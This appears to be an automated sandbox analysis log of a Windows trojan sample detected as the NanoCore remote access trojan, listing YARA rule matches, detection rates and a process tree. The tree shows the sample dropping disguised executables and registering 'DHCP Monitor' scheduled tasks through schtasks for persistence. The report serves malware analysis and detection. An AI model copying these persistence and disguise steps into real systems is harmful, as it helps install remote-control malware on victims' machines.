            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 0049058C appears 56 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004109E8 appears 31 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004049C0 appears 66 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004070F0 appears 69 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 00404CCC appears 49 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 0049058C appears 56 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004109E8 appears 34 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004049C0 appears 76 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004070F0 appears 81 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 00404CCC appears 54 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0043F118 NtdllDefWindowProc_A,GetCapture,4_2_0043F118
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004598AC NtdllDefWindowProc_A,4_2_004598AC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,4_2_0045A054
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,4_2_0045A104
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,4_2_0045E9EC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,4_2_0044EA40
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042F60C NtdllDefWindowProc_A,4_2_0042F60C
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,9_2_0043F118
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004598AC NtdllDefWindowProc_A,9_2_004598AC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,9_2_0045E9EC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,733AB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,9_2_0044EA40
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0042F60C NtdllDefWindowProc_A,9_2_0042F60C
            Source: ._cache_y8kdmHi6x3.exe.4.drStatic PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Source: ._cache_y8kdmHi6x3.exe.4.drStatic PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: WINDOWS.EXE.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Source: WINDOWS.EXE.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: y8kdmHi6x3.exe, 00000000.00000002.322526944.000000000077C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSkeet Swapper1.exe< vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exeBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.312757349.0000000000D8C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSkeet Swapper1.exe< vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Synaptics.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: ._cache_WINDOWS.EXE.9.drStatic PE information: Section: .rsrc ZLIB complexity 0.995641331215
            Source: y8kdmHi6x3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\y8kdmHi6x3.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@47/38@27/5
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: SYSTEM32.EXE.6.dr, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: SYSTEM32.EXE.6.dr, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00425FB8 GetLastError,FormatMessageA,9_2_00425FB8
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004747D8 FindResourceA,4_2_004747D8
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile created: C:\Program Files (x86)\DHCP Monitor
            Source: y8kdmHi6x3.exeVirustotal: Detection: 57%
            Source: y8kdmHi6x3.exeMetadefender: Detection: 48%
            Source: y8kdmHi6x3.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeFile read: C:\Users\user\Desktop\y8kdmHi6x3.exeJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\y8kdmHi6x3.exe "C:\Users\user\Desktop\y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
            Source: unknownProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE C:\Users\user\Desktop\._cache_WINDOWS.EXE 0
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeProcess created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeProcess created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeProcess created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
            Source: C:\Users\user\Desktop\._cache_Synaptics.exeProcess created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeProcess created: C:\ProgramData\Synaptics\SYSTEM32.EXE "C:\ProgramData\Synaptics\SYSTEM32.EXE"
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exeProcess created: C:\ProgramData\Synaptics\WINDOWS.EXE "C:\ProgramData\Synaptics\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\WINDOWS.EXEProcess created: C:\ProgramData\Synaptics\._cache_WINDOWS.EXE "C:\ProgramData\Synaptics\._cache_WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exeJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe" Jump to behavior
